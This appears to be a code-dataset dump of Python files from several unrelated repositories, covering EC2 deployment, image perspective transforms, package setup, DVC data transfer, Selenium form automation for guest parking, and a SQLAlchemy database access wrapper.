| metadata (dict) | text (string, 60 – 3.49M chars) |
|---|---|
{
"source": "jojochuang/eventwave",
"score": 3
} |
#### File: tools/contextlattice/deployec2.py
```python
import os
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
import argparse
# set up variables
EC2_ACCESS_ID = '<KEY>'
EC2_SECRET_KEY = '<KEY>'
http_server = "https://galba.cs.purdue.edu:54321/"
Driver = get_driver(Provider.EC2)
conn = Driver(EC2_ACCESS_ID, EC2_SECRET_KEY)
nodes = conn.list_nodes()
for n in nodes:
print "Instance name: " + n.name + " IP: " + n.public_ips[0];
class Deploy( argparse.Action ):
def __call__(self, parser, namespace, values, option_string=None):
nodeips = " ".join( str(ip.public_ips[0]) for ip in nodes )
# download execuable
command = "curl " + http_server + "firstTag"
dlApplication = "pssh -H \"" + nodeips + "\" -l ubuntu -O \"IdentityFile ~/.ssh/contextlattice.pem\" " + command
os.system( dlApplication );
# download parameter file
command = "curl " + http_server + "params.tag"
dlApplication = "pssh -H \"" + nodeips + "\" -l ubuntu -O \"IdentityFile ~/.ssh/contextlattice.pem\" " + command
os.system( dlApplication );
# launch process
command = "./firstTag params.tag"
dlApplication = "pssh -H \"" + nodeips + "\" -l ubuntu -O \"IdentityFile ~/.ssh/contextlattice.pem\" " + command
os.system( dlApplication );
# command line option parser
parser = argparse.ArgumentParser(description='Tool for deploying and launching nodes in EC2.')
parser.add_argument('--listnode', nargs='?', default='a',dest='option_list', help="List EC2 nodes. Don't do anything else.")
parser.add_argument('--deploy', nargs='?', default='a', action=Deploy, help="Deploy executables and parameter files to the EC2 nodes.")
args = parser.parse_args()
``` |
{
"source": "jojo-/deepstream-birdseye",
"score": 2
} |
#### File: jojo-/deepstream-birdseye/perspective.py
```python
import numpy as np
import cv2
# Create the projection matrix based on the landmark correspondence between 2 images
# Note: if no target/source points are given, default values for the demo are used
def ipm(source_points = None, target_points = None):
if source_points is None:
source_points = np.array(
[[551, 1031],
[487, 826],
[480, 366],
[964, 280]], dtype=np.float32
)
if target_points is None:
target_points = np.array(
[[404, 196],
[522, 202],
[1252, 339],
[1101, 752]], dtype=np.float32
)
# Compute projection matrix
M = cv2.getPerspectiveTransform(source_points, target_points)
return M
# Using the matrix generated by the `ipm` function, convert the coordinates of a pixel
# in the source image to the destination image
def convert_coordinates(point, M):
    # build the homogeneous coordinate [x, y, 1] for the pixel
    orig_px = np.array([point[0], point[1], 1])
    tf_orig_px = M.dot(orig_px)
    tf_orig_px = tf_orig_px / tf_orig_px[2]
    return tf_orig_px
# Using the matrix generated by the `ipm` function, convert the coordinates of a set of pixels
# in the source image to the destination image
def convert_set_cooordinates(points, M):
orig_pxs = np.array([[x, y, 1] for [x, y] in points]).T
tf_orig_pxs = M.dot(orig_pxs)
tf_orig_pxs /= tf_orig_pxs[2]
transf_points = np.array([[x,y] for [x, y] in tf_orig_pxs[:2].T])
return transf_points
def test():
import matplotlib
matplotlib.use("GTK3Agg")
import matplotlib.pyplot as plt
# Reading an input file
im_cam_view = "input/camera_view.png"
im = plt.imread(im_cam_view)
# Compute the transformation matrix
M = ipm()
# Warp the image
warped = cv2.warpPerspective(im, M, (im.shape[:2][1], im.shape[:2][0]), flags=cv2.INTER_LANCZOS4, borderMode=cv2.BORDER_CONSTANT, borderValue=0)
# Convert a point to new coordinates
    orig_px = [1026, 408, 1]
    tf_orig_px = M.dot(orig_px)
    tf_orig_px = tf_orig_px / tf_orig_px[2]
# Draw results
fig, ax = plt.subplots(1, 2)
ax[0].imshow(im)
ax[0].set_title('Front View')
ax[0].plot(orig_px[0], orig_px[1], 'bo')
ax[1].imshow(warped)
ax[1].set_title('IPM')
ax[1].plot(tf_orig_px[0], tf_orig_px[1], 'bo')
plt.tight_layout()
plt.show()
# Testing code
if __name__ == '__main__':
test()
``` |
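A minimal usage sketch for the two helpers above, assuming the file is importable as `perspective` (the module name and the sample pixel values here are illustrative only).

```python
import numpy as np

import perspective  # assumed module name for the file above

# Build the homography from the default landmark correspondences.
M = perspective.ipm()

# Map two source-image pixels into the bird's-eye view.
points = np.array([[551, 1031], [964, 280]], dtype=np.float32)
warped_points = perspective.convert_set_cooordinates(points, M)
print(warped_points)  # one (x, y) row per input pixel
```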
{
"source": "JojoDevel/apriltags",
"score": 2
} |
#### File: JojoDevel/apriltags/setup.py
```python
import platform
import re
from pathlib import Path
from skbuild import setup
package_dir = "src"
package = "pupil_apriltags"
install_requires = ["numpy"]
if platform.system() == "Windows":
install_requires.append("pupil-pthreads-win")
cmake_args = []
if platform.system() == "Windows":
import pupil_pthreads_win as ptw
cmake_args.append(f"-DPTHREADS_WIN_INCLUDE_DIR='{ptw.include_path}'")
cmake_args.append(f"-DPTHREADS_WIN_IMPORT_LIB_PATH='{ptw.import_lib_path}'")
# The Ninja cmake generator will use mingw (gcc) on windows travis instances, but we
# need to use msvc for compatibility. The easiest solution I found was to just use
# the vs cmake generator as it defaults to msvc.
cmake_args.append("-GVisual Studio 15 2017 Win64")
cmake_args.append("-DCMAKE_WINDOWS_EXPORT_ALL_SYMBOLS=True")
with open("README.md") as readme_file:
readme = readme_file.read()
def read_version(path: Path):
with path.open() as f:
version_file = f.read()
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]", version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
here = Path(__file__).parent
setup(
author="<NAME> <EMAIL>",
author_email="<EMAIL>",
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
],
cmake_args=cmake_args,
cmake_install_dir="src/pupil_apriltags",
description="Python bindings for apriltags v3",
extras_require={"dev": ["pytest", "tox"]},
install_requires=install_requires,
license="MIT license",
long_description=readme,
long_description_content_type="text/markdown",
include_package_data=True,
keywords="apriltags",
name="pupil-apriltags",
packages=[package],
package_dir={"": package_dir},
test_suite="tests",
url="https://github.com/pupil-labs/apriltags",
version=read_version(here / package_dir / package / "__init__.py"),
zip_safe=False,
)
``` |
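To illustrate what `read_version` expects, here is a small standalone sketch of the same regex applied to a hypothetical `__init__.py`; the file content below is made up for demonstration only.

```python
import re
from pathlib import Path
from tempfile import TemporaryDirectory

with TemporaryDirectory() as tmp:
    init_py = Path(tmp) / "__init__.py"
    init_py.write_text('__version__ = "1.2.3"\n')  # hypothetical module file

    # Same pattern as read_version() in the setup.py above.
    match = re.search(
        r"^__version__ = ['\"]([^'\"]*)['\"]", init_py.read_text(), re.M
    )
    print(match.group(1))  # -> 1.2.3
```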
{
"source": "JojoDevel/depthai-lightning",
"score": 2
} |
#### File: depthai-lightning/depthai_lightning/depthai_lightning.py
```python
import logging
import depthai as dai
class PipelineManager:
"""Hihg-level pipeline manager"""
xstream_names = set()
def __init__(self):
self.pipeline = dai.Pipeline()
self.device = None
self.nodes = []
def createDevice(self):
self.device = dai.Device(self.pipeline)
for node in self.nodes:
node.activate(self.device)
return self.device
def add_xstream_name(self, name: str) -> str:
"""Allows to safely add an xlink stream name. If the name already exists, a new unique will be generated.
Args:
name (str): the preferred xstream name.
Returns:
str: unique xstream name
"""
assert name
if name in self.xstream_names:
# generate new name
temp_name = str(name)
index = 0
            while temp_name in self.xstream_names:
                temp_name = f"{name}_{index}"
                index += 1
logging.info("Rename requested stream: %s -> %s", name, temp_name)
name = temp_name
self.xstream_names.add(name)
return name
``` |
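A short sketch of the name-deduplication behaviour above, assuming the `depthai` package is installed (the constructor builds a `dai.Pipeline`, but no device is needed) and that the module is importable under the path shown in the file header.

```python
from depthai_lightning.depthai_lightning import PipelineManager  # assumed import path

pm = PipelineManager()

print(pm.add_xstream_name("rgb"))  # "rgb"
print(pm.add_xstream_name("rgb"))  # "rgb_0" (renamed to stay unique)
print(pm.add_xstream_name("rgb"))  # "rgb_1"
```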
{
"source": "JojoDevel/dvc",
"score": 2
} |
#### File: dvc/objects/transfer.py
```python
import errno
import itertools
import logging
from concurrent import futures
from concurrent.futures import ThreadPoolExecutor
from functools import partial, wraps
from typing import TYPE_CHECKING, Callable, Iterable, Optional
from funcy import split
from dvc.progress import Tqdm
if TYPE_CHECKING:
from dvc.hash_info import HashInfo
from .db.base import ObjectDB
from .db.index import ObjectDBIndexBase
logger = logging.getLogger(__name__)
def _log_exceptions(func):
@wraps(func)
def wrapper(path_info, *args, **kwargs):
try:
func(path_info, *args, **kwargs)
return 0
except Exception as exc: # pylint: disable=broad-except
# NOTE: this means we ran out of file descriptors and there is no
# reason to try to proceed, as we will hit this error anyways.
# pylint: disable=no-member
if isinstance(exc, OSError) and exc.errno == errno.EMFILE:
raise
logger.exception("failed to transfer '%s'", path_info)
return 1
return wrapper
def _transfer(
src, dest, dir_ids, file_ids, missing_ids, jobs, verify, move, **kwargs
):
func = _log_exceptions(dest.add)
total = len(dir_ids) + len(file_ids)
if total == 0:
return 0
with Tqdm(total=total, unit="file", desc="Transferring") as pbar:
func = pbar.wrap_fn(func)
with ThreadPoolExecutor(max_workers=jobs) as executor:
processor = partial(
_create_tasks,
executor,
jobs,
func,
src,
verify,
move,
)
processor.add_func = func
_do_transfer(
src,
dest,
dir_ids,
file_ids,
missing_ids,
processor,
verify=verify,
move=move,
**kwargs,
)
return total
def _create_tasks(executor, jobs, func, src, verify, move, obj_ids):
fails = 0
hash_iter = iter(obj_ids)
def submit(hash_info):
obj = src.get(hash_info)
return executor.submit(
func,
obj.path_info,
obj.fs,
obj.hash_info,
verify=verify,
move=move,
)
def create_taskset(amount):
return {
submit(hash_info)
for hash_info in itertools.islice(hash_iter, amount)
}
tasks = create_taskset(jobs * 5)
while tasks:
done, tasks = futures.wait(tasks, return_when=futures.FIRST_COMPLETED)
fails += sum(task.result() for task in done)
tasks.update(create_taskset(len(done)))
return fails
def _do_transfer(
src: "ObjectDB",
dest: "ObjectDB",
dir_ids: Iterable["HashInfo"],
file_ids: Iterable["HashInfo"],
missing_ids: Iterable["HashInfo"],
processor: Callable,
src_index: Optional["ObjectDBIndexBase"] = None,
dest_index: Optional["ObjectDBIndexBase"] = None,
cache_odb: Optional["ObjectDB"] = None,
**kwargs,
):
from dvc.exceptions import FileTransferError
from dvc.objects.errors import ObjectFormatError
total_fails = 0
succeeded_dir_objs = []
all_file_ids = set(file_ids)
for dir_hash in dir_ids:
from .tree import Tree
bound_file_ids = set()
dir_obj: Optional["Tree"] = None
for odb in (cache_odb, src):
if odb is not None:
try:
dir_obj = Tree.load(odb, dir_hash)
break
except (FileNotFoundError, ObjectFormatError):
pass
assert dir_obj
entry_ids = {entry.hash_info for _, entry in dir_obj}
for file_hash in all_file_ids.copy():
if file_hash in entry_ids:
bound_file_ids.add(file_hash)
all_file_ids.remove(file_hash)
dir_fails = processor(bound_file_ids)
if dir_fails:
logger.debug(
"failed to upload full contents of '%s', "
"aborting .dir file upload",
dir_obj.name,
)
logger.error(
"failed to upload '%s' to '%s'",
src.get(dir_obj.hash_info).path_info,
dest.get(dir_obj.hash_info).path_info,
)
total_fails += dir_fails + 1
elif entry_ids.intersection(missing_ids):
# if for some reason a file contained in this dir is
# missing both locally and in the remote, we want to
# push whatever file content we have, but should not
# push .dir file
logger.debug(
"directory '%s' contains missing files,"
"skipping .dir file upload",
dir_obj.name,
)
else:
raw_obj = src.get(dir_obj.hash_info)
is_dir_failed = processor.add_func( # type: ignore[attr-defined]
raw_obj.path_info,
raw_obj.fs,
raw_obj.hash_info,
**kwargs,
)
total_fails += is_dir_failed
if not is_dir_failed:
succeeded_dir_objs.append(dir_obj)
# insert the rest
total_fails += processor(all_file_ids)
if total_fails:
if src_index:
src_index.clear()
raise FileTransferError(total_fails)
# index successfully pushed dirs
if dest_index:
for dir_obj in succeeded_dir_objs:
file_hashes = {entry.hash_info.value for _, entry in dir_obj}
logger.debug(
"Indexing pushed dir '%s' with '%s' nested files",
dir_obj.hash_info,
len(file_hashes),
)
assert dir_obj.hash_info and dir_obj.hash_info.value
dest_index.update([dir_obj.hash_info.value], file_hashes)
def transfer(
src: "ObjectDB",
dest: "ObjectDB",
obj_ids: Iterable["HashInfo"],
jobs: Optional[int] = None,
verify: bool = False,
move: bool = False,
**kwargs,
) -> int:
"""Transfer (copy) the specified objects from one ODB to another.
Returns the number of successfully transferred objects
"""
from .status import compare_status
logger.debug(
"Preparing to transfer data from '%s' to '%s'",
src.path_info,
dest.path_info,
)
if src == dest:
return 0
status = compare_status(src, dest, obj_ids, check_deleted=False, **kwargs)
if not status.new:
return 0
dir_ids, file_ids = split(lambda hash_info: hash_info.isdir, status.new)
if jobs is None:
jobs = dest.fs.jobs
return _transfer(
src,
dest,
set(dir_ids),
set(file_ids),
status.missing,
jobs,
verify,
move,
**kwargs,
)
```
#### File: unit/utils/test_http.py
```python
import io
import requests
from dvc.utils.http import open_url
def read_nbytes(fd, num, mode="r"):
data = b"" if mode == "rb" else ""
while len(data) < num:
chunk = fd.read(num - len(data))
if not chunk:
break
data += chunk
return data
def test_open_url(tmp_path, monkeypatch, http):
# Simulate bad connection
original_iter_content = requests.Response.iter_content
def bad_iter_content(self, *args, **kwargs):
it = original_iter_content(self, *args, **kwargs)
for i, chunk in enumerate(it):
# Drop connection error on second chunk if there is one
if i > 0:
raise requests.ConnectionError("Simulated connection drop")
yield chunk
monkeypatch.setattr(requests.Response, "iter_content", bad_iter_content)
# Text should be longer than default chunk to test resume,
# using twice of that plus something tests second resume,
# this is important because second response is different
text = "0123456789" * (io.DEFAULT_BUFFER_SIZE // 10 + 1)
http.gen("sample.txt", text * 2)
with open_url((http / "sample.txt").url) as fd:
# Test various .read() variants
assert read_nbytes(fd, len(text), mode="r") == text
assert fd.read() == text
assert fd.read() == ""
def test_open_url_peek_rb(tmp_path, monkeypatch, http):
# Goes over seek feature in 'rb' mode
text = "0123456789" * (io.DEFAULT_BUFFER_SIZE // 10 + 1)
http.gen("sample.txt", text * 2)
with open_url((http / "sample.txt").url, mode="rb") as fd:
text = text.encode("utf8")
assert fd.peek(len(text)) == text # pylint: disable=no-member
assert read_nbytes(fd, len(text), mode="rb") == text
assert fd.peek(len(text)) == text # pylint: disable=no-member
assert fd.read() == text
assert fd.read() == b""
``` |
{
"source": "jojoduquartier/automated-guest-parking",
"score": 3
} |
#### File: jojoduquartier/automated-guest-parking/registration.py
```python
import time
from selenium import webdriver
def register_my_car(
url_,
apt_,
make_,
model_,
color_,
plate_,
phone_,
email_,
apt_unit,
apt_owner_fname,
apt_owner_lname,
**kwargs,
):
"""
Literally every step is spelled out but that is ok. Simple site.
"""
# xattr -d com.apple.quarantine /usr/local/bin/chromedriver
driver = webdriver.Chrome()
driver.get(url_)
try:
# apartment community
apt_input = driver.find_element_by_class_name("input__field")
apt_input.send_keys(apt_)
# after sending the apt there should be option to select
time.sleep(1)
xpath = "/html/body/div/div[2]/form/div[1]/div/div/div/ul/li"
to_click = driver.find_element_by_xpath(xpath)
to_click.click()
# resident info
xpath = "/html/body/div/div[2]/form/div[2]/div/div[1]/div/div/input"
f_name = driver.find_element_by_xpath(xpath)
f_name.send_keys(apt_owner_fname)
xpath = "/html/body/div/div[2]/form/div[2]/div/div[2]/div/div/input"
l_name = driver.find_element_by_xpath(xpath)
l_name.send_keys(apt_owner_lname)
xpath = "/html/body/div/div[2]/form/div[2]/div/div[3]/div/div/input"
unit = driver.find_element_by_xpath(xpath)
unit.send_keys(apt_unit)
# guest info
xpath = "/html/body/div/div[2]/form/div[3]/div/div[1]/div/div/input"
make = driver.find_element_by_xpath(xpath)
make.send_keys(make_)
xpath = "/html/body/div/div[2]/form/div[3]/div/div[2]/div/div/input"
model = driver.find_element_by_xpath(xpath)
model.send_keys(model_)
xpath = "/html/body/div/div[2]/form/div[3]/div/div[3]/div/div/input"
color = driver.find_element_by_xpath(xpath)
color.send_keys(color_)
xpath = "/html/body/div/div[2]/form/div[3]/div/div[4]/div/div/input"
plate = driver.find_element_by_xpath(xpath)
plate.send_keys(plate_)
# guest contact
xpath = "/html/body/div/div[2]/form/div[4]/div/div[1]/div/div/input"
phone = driver.find_element_by_xpath(xpath)
phone.send_keys(phone_)
xpath = "/html/body/div/div[2]/form/div[4]/div/div[2]/div[2]/div/input"
email = driver.find_element_by_xpath(xpath)
email.send_keys(email_)
# submit
submit = driver.find_element_by_tag_name("button")
submit.submit()
except Exception as e:
return False, e
finally:
time.sleep(1)
driver.close()
return True, None
``` |
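A hedged call sketch for the function above, assuming the file is importable as `registration` and that a matching chromedriver is on the PATH; every value below is a placeholder for illustration only.

```python
from registration import register_my_car  # assumed module name for the file above

# All values are hypothetical placeholders.
ok, err = register_my_car(
    url_="https://example-guest-parking.test/register",  # hypothetical form URL
    apt_="Example Apartments",
    make_="Toyota",
    model_="Corolla",
    color_="Blue",
    plate_="ABC1234",
    phone_="555-555-5555",
    email_="guest@example.com",
    apt_unit="12B",
    apt_owner_fname="Jane",
    apt_owner_lname="Doe",
)
if not ok:
    print(f"registration failed: {err}")
```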
{
"source": "jojoduquartier/dsdbmanager",
"score": 2
} |
#### File: dsdbmanager/dsdbmanager/cli.py
```python
import click
@click.group()
def main():
"""
:return:
"""
pass
@main.command()
def add_database():
from dsdbmanager.configuring import ConfigFilesManager
manager = ConfigFilesManager()
manager.add_new_database_info()
@main.command()
def remove_database():
from dsdbmanager.configuring import ConfigFilesManager
manager = ConfigFilesManager()
manager.remove_database()
@main.command()
def reset_credentials():
from dsdbmanager.configuring import ConfigFilesManager
manager = ConfigFilesManager()
manager.reset_credentials()
```
#### File: dsdbmanager/dsdbmanager/dbobject.py
```python
import time
import typing
import toolz
import inspect
import functools
import warnings
import numpy as np
import pandas as pd
import sqlalchemy as sa
import sqlalchemy.exc as exc
import sqlalchemy.sql.dml as dml
from .mssql_ import Mssql
from .mysql_ import Mysql
from .oracle_ import Oracle
from .teradata_ import Teradata
from .snowflake_ import Snowflake
from sqlalchemy.engine import reflection
from .configuring import ConfigFilesManager
from .utils import d_frame, inspect_table, filter_maker
from .constants import FLAVORS_FOR_CONFIG, CACHE_SIZE, CHUNK_SIZE
from .exceptions_ import (
BadArgumentType, OperationalError, NoSuchColumn, MissingFlavor, NotImplementedFlavor,
EmptyHostFile
)
host_type = typing.Dict[str, typing.Dict[str, typing.Dict[str, str]]]
update_key_type = typing.Union[typing.Tuple[str, ...], typing.Dict[str, str]]
table_middleware_type = typing.Callable[..., typing.Tuple[np.ndarray, typing.Tuple[str, ...]]]
connection_object_type = typing.Union[
Oracle,
Teradata,
Mysql,
Mssql,
Snowflake
]
def util_function(table_name: str, engine: sa.engine.base.Engine, schema: str) -> sa.Table:
"""
:param table_name: a table name. It must be a table in the schema of the engine
:param engine: the sqlalchemy engine for the database
:param schema: a schema of interest - None if default schema of database is ok
:return: the sqlalchemy Table type for the table name provided
"""
try:
return sa.Table(table_name, sa.MetaData(engine, schema=schema), autoload=True)
except exc.NoSuchTableError as e:
raise e
def insert_into_table(df: pd.DataFrame, table_name: str, engine: sa.engine.Engine, schema: str) -> int:
"""
:param df: a dataframe with same column names as those in the database table
:param table_name: a table name as in util_function
:param engine: the sqlalchemy engine for the database
:param schema: a schema of interest - None if default schema of database is ok
:return: the number of records inserted
"""
# get the table
tbl = util_function(table_name, engine, schema)
# change all nan to None
groups = toolz.partition_all(CHUNK_SIZE, df.where(pd.notnull(df), None).to_dict(orient='records'))
# insert
count, last_successful_insert = 0, None
with engine.connect() as connection:
for group in groups:
try:
result = connection.execute(tbl.insert(), group)
last_successful_insert = group[-1]
count += result.rowcount
            except exc.OperationalError as _:
                # try again
time.sleep(2)
try:
result = connection.execute(tbl.insert(), group)
last_successful_insert = group[-1]
count += result.rowcount
except exc.OperationalError as e:
raise OperationalError(f"Failed to insert records. Last successful{last_successful_insert}", e)
return count
def update_on_table(df: pd.DataFrame, keys: update_key_type, values: update_key_type, table_name: str,
engine: sa.engine.base.Engine, schema: str) -> int:
"""
    :param df: a dataframe with data that needs to be updated. Must have columns to be used as keys and some for values
:param keys: the set of columns to use as key, i.e. update when matched
:param values: the set of columns to update, i.e. set when matched
:param table_name: a table name as in util_function
:param engine: the sqlalchemy engine for the database
:param schema: a schema of interest - None if default schema of database is ok
:return: the number of records updated
"""
# get table
tbl = util_function(table_name, engine, schema)
# change nan to None, make sure columns are modified so that we can easily bindparam
df_ = df.copy()
df_.columns = [f"{el.lower()}_updt" for el in df_.columns]
groups = toolz.partition_all(CHUNK_SIZE, df_.where(pd.notnull(df_), None).to_dict(orient='records'))
if not isinstance(keys, tuple) and not isinstance(keys, dict):
raise BadArgumentType("keys and values must either be both tuples or both dicts", None)
# create where clause, and update statement
update_statement: dml.Update
if isinstance(keys, tuple):
if not isinstance(values, tuple):
raise BadArgumentType("keys and values must either be both tuples or both dicts", None)
where = [tbl.c[el] == sa.bindparam(f"{el.lower()}_updt") for el in keys]
update_statement = tbl.update().where(sa.and_(*where)).values(
dict((a, sa.bindparam(f"{a.lower()}_updt")) for a in values)
)
if isinstance(keys, dict):
if not isinstance(values, dict):
raise BadArgumentType("keys and values must either be both tuples or both dicts", None)
where = [tbl.c[k] == sa.bindparam(f"{v.lower()}_updt") for k, v in keys.items()]
update_statement = tbl.update().where(sa.and_(*where)).values(
dict((k, sa.bindparam(f"{v.lower()}_updt")) for k, v in values.items())
)
# update
count, last_successful_update = 0, None
with engine.connect() as connection:
for group in groups:
try:
result = connection.execute(update_statement, group)
last_successful_update = group[-1]
count += result.rowcount
except exc.OperationalError as _:
# try again
time.sleep(2)
try:
result = connection.execute(update_statement, group)
last_successful_update = group[-1]
count += result.rowcount
except exc.OperationalError as e:
raise OperationalError(
f"Failed to update records. Last successful update: {last_successful_update}", e
)
return count
def table_middleware(engine: sa.engine.base.Engine, table: str, schema: str = None):
"""
This does not directly look for the tables; it simply gives a function that can be used to specify
number of rows and columns etc. When this function is evaluated, it returns a function that holds the context.
That function has the table name, the schema and engine. It then knows what to query once it is called.
:param engine: the sqlalchemy engine for the database
:param table: a table name as in util_function
:param schema: a schema of interest - None if default schema of database is ok
:return: a function that when called, pulls data from the database table specified with 'table' arg
"""
@d_frame
@functools.lru_cache(CACHE_SIZE)
def wrapped(
rows: int = None,
columns: typing.Tuple[str, ...] = None,
**kwargs
) -> typing.Tuple[np.ndarray, typing.Tuple[str, ...]]:
"""
:param rows: number of rows of data to pull
:param columns: set of columns to pull
:param kwargs: column to filter
:return:
"""
tbl = util_function(table, engine, schema)
# query
tbl_cols = [el.name for el in tbl.columns]
if columns is None:
query = sa.select([tbl])
else:
# check if all columns are in table
not_in_table = set(columns) - set(tbl_cols)
if not_in_table == set(columns):
raise NoSuchColumn(f"None of the columns [{', '.join(sorted(columns))}] are in table {table}", None)
if len(not_in_table) > 0:
warnings.warn(f"Columns [{', '.join(sorted(not_in_table))}] are not in table {table}")
tbl_cols = [el for el in columns if el in tbl_cols]
query = sa.select([tbl.c[col] for col in tbl_cols])
if kwargs:
filters = [filter_maker(tbl, el, val) for el, val in kwargs.items()]
query = query.where(sa.and_(*filters))
# execute
with engine.connect() as connection:
results = connection.execute(query)
# fetch
if rows is not None:
array = results.fetchmany(rows)
else:
array = results.fetchall()
results.close()
# return dataframe
arr, cols = np.array(array), tuple(tbl_cols)
arr.flags.writeable = False
return arr, cols
return wrapped
class DbMiddleware(object):
"""
This is the main class that is wrapped around the sqlalchemy engines
Assume I have two tables, 'table_1' and 'table 2' in my default schema for an engine
>>> dbobject = DbMiddleware(engine, False, None)
>>> dbobject.sqlalchemy_engine.table_names()
['table_1', 'table 2']
    I can access the tables as if they were properties or methods
    >>> dbobject.table_1
    >>> dbobject['table 2'] # because it is not possible to use the . notation here
    But these do not do anything on their own; in fact they are all just functions that I can call
    >>> dbobject.table_1(rows=10) # to get the first 10 rows
    >>> dbobject['table 2'](rows=100, columns=('column', 'column with space')) # to only get the specified columns
    I can also filter my data.
    Say I want column_3 in table_1 to be equal to 'some_value'
    >>> dbobject.table_1(column_3='some_value')
    If I want to get data only when column_3 is either 'some_value' or 'other_value'
    >>> dbobject.table_1(column_3=('some_value', 'other_value')) # here I pass a tuple instead of a single value
    Tuples are used all around simply because we cache the results of these methods, i.e. the dataframes
    Say I had a column name with spaces that ruled out the dot-notation call above, I could do this
    >>> dbobject.table_1(**{'column with space': 'some_value'}) # simply unpacking the dictionary at execution time
    All those methods to pull data are **table_middleware** functions already evaluated at engine,
    table name and schema level.
    Bonus
    Get metadata on your table
    >>> dbobject._metadata.table_1()
"""
def __init__(self, engine: sa.engine.Engine, connect_only: bool, schema: str = None):
self._sqlalchemy_engine = engine
if not connect_only:
inspection = reflection.Inspector.from_engine(self._sqlalchemy_engine)
# without schema, the inspector throws AttributeError
# any other error should be raised
try:
views = inspection.get_view_names(schema=schema)
tables = inspection.get_table_names(schema=schema)
except AttributeError as _:
views, tables = [], []
if not (tables + views):
pass
self._metadata = TableMeta(self.sqlalchemy_engine, schema, tables + views)
self._insert = TableInsert(self.sqlalchemy_engine, schema, tables + views)
self._update = TableUpdate(self.sqlalchemy_engine, schema, tables + views)
for table in tables + views:
self.__setattr__(table, table_middleware(self._sqlalchemy_engine, table, schema=schema))
@property
def sqlalchemy_engine(self):
return self._sqlalchemy_engine
@sqlalchemy_engine.setter
def sqlalchemy_engine(self, value):
raise AttributeError("sqlalchemy_engine cannot be changed")
@sqlalchemy_engine.deleter
def sqlalchemy_engine(self):
del self._sqlalchemy_engine
def __getitem__(self, item):
return self.__dict__[item]
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._sqlalchemy_engine.dispose()
properties = map(toolz.first, inspect.getmembers(self))
methods_only = map(toolz.first, inspect.getmembers(self, inspect.ismethod))
attributes = filter(lambda x: not x.startswith('__'), set(properties) - set(methods_only))
for attribute in attributes:
if attribute == 'sqlalchemy_engine':
continue # _sqlalchemy_engine is all we need to clear
delattr(self, attribute)
@toolz.curry
def db_middleware(config_manager: ConfigFilesManager, flavor: str, db_name: str,
connection_object: connection_object_type, config_schema: str, connect_only: bool,
schema: str = None, **engine_kwargs) -> DbMiddleware:
"""
Try connecting to the database. Write credentials on success. Using a function only so that the connection
is only attempted when function is called.
:param config_manager: a configuration manager to deal with host files etc
:param flavor: the sql flavor/dialect where the database lies
:param db_name: database name provided when adding database
:param connection_object: one of the connectors from the likes of myql_.py to create engine
:param config_schema: the schema provided when adding database
:param connect_only: True if all we want is connect and not inspect for tables or views
:param schema: if user wants to specify a different schema than the one supplied when adding database
:param engine_kwargs: engine arguments, like echo, or warehouse, schema and role for snowflake
:return:
"""
username, password = config_manager.read_credentials(flavor, db_name)
write_credentials = True
if username is None or password is None:
username, password = config_manager.ask_credentials()
else:
write_credentials = False
engine: sa.engine.base.Engine = connection_object.create_engine(
config_manager.encrypt_decrypt(username, encrypt=False).decode("utf-8"),
config_manager.encrypt_decrypt(password, encrypt=False).decode("utf-8"),
**engine_kwargs
)
try:
engine.connect().close()
except exc.DatabaseError as e:
raise e
if write_credentials:
config_manager.write_credentials(flavor, db_name, username, password)
if not schema:
schema = config_schema
# technically when connect_only is True, schema should not matter
middleware = DbMiddleware(engine, connect_only, schema)
return middleware
class DsDbManager(object):
"""
oracle = DsDbManager('oracle') # will create the object with databases as properties/methods
oracle.somedatabase # a function to call with <connect_only, schema>
-or-
oracle['some data base']
"""
def __init__(self, flavor: str, config_file_manager: ConfigFilesManager = None):
if flavor.lower() not in FLAVORS_FOR_CONFIG:
raise NotImplementedFlavor(
f"Invalid flavor: expected one of {', '.join(FLAVORS_FOR_CONFIG)}, got {flavor}",
None
)
self._flavor = flavor
self._config_file_manager = ConfigFilesManager() if config_file_manager is None else config_file_manager
self._host_dict = self._config_file_manager.get_hosts()
if not self._host_dict:
raise EmptyHostFile("Host file is empty", None)
if flavor not in self._host_dict:
raise MissingFlavor(f"No databases for {flavor}", None)
# available databases
self._available_databases = list(self._host_dict.get(flavor).keys())
self._schemas_per_databases = [
self._host_dict.get(flavor).get(database).get('schema', None)
for database in self._available_databases
]
# TODO: use schema provided by user if any. This will probably involve checking host dictionary
for db_name, config_schema in zip(self._available_databases, self._schemas_per_databases):
self.__setattr__(
db_name,
db_middleware(
self._config_file_manager,
self._flavor,
db_name,
self._connection_object_creator(db_name),
config_schema
)
)
def _connection_object_creator(self, db_name: str):
if self._flavor.lower() == 'oracle':
return Oracle(db_name, self._host_dict)
if self._flavor.lower() == 'teradata':
return Teradata(db_name, self._host_dict)
if self._flavor.lower() == 'mssql':
return Mssql(db_name, self._host_dict)
if self._flavor.lower() == 'mysql':
return Mysql(db_name, self._host_dict)
if self._flavor.lower() == 'snowflake':
return Snowflake(db_name, self._host_dict)
def __getitem__(self, item):
return self.__dict__[item]
class TableMeta(object):
"""
We have to create distinct functions for each table. Once the function is called, the metadata is provided
"""
def __init__(self, engine: sa.engine.base.Engine, schema: str, tables: typing.Tuple[str, ...]):
for table in tables:
def meta_function(t: str = table):
tbl = util_function(t, engine, schema)
return inspect_table(tbl)
self.__setattr__(table, meta_function)
class TableInsert(object):
"""
distinct functions for each table
"""
def __init__(self, engine: sa.engine.base.Engine, schema: str, tables: typing.Tuple[str, ...]):
for table in tables:
insert_function = functools.partial(insert_into_table, engine=engine, schema=schema)
def insert_func(df: pd.DataFrame, t: str = table):
"""
:param df:
:param t:
:return:
"""
return insert_function(df, t)
self.__setattr__(table, insert_func)
class TableUpdate(object):
"""
distinct functions for each table
"""
def __init__(self, engine: sa.engine.base.Engine, schema: str, tables: typing.Tuple[str, ...]):
for table in tables:
update_function = functools.partial(update_on_table, engine=engine, schema=schema)
def update_func(df: pd.DataFrame, keys: update_key_type, values: update_key_type, t: str = table):
"""
:param df:
:param keys:
:param values:
:param t:
:return:
"""
return update_function(df, keys, values, t)
self.__setattr__(table, update_func)
```
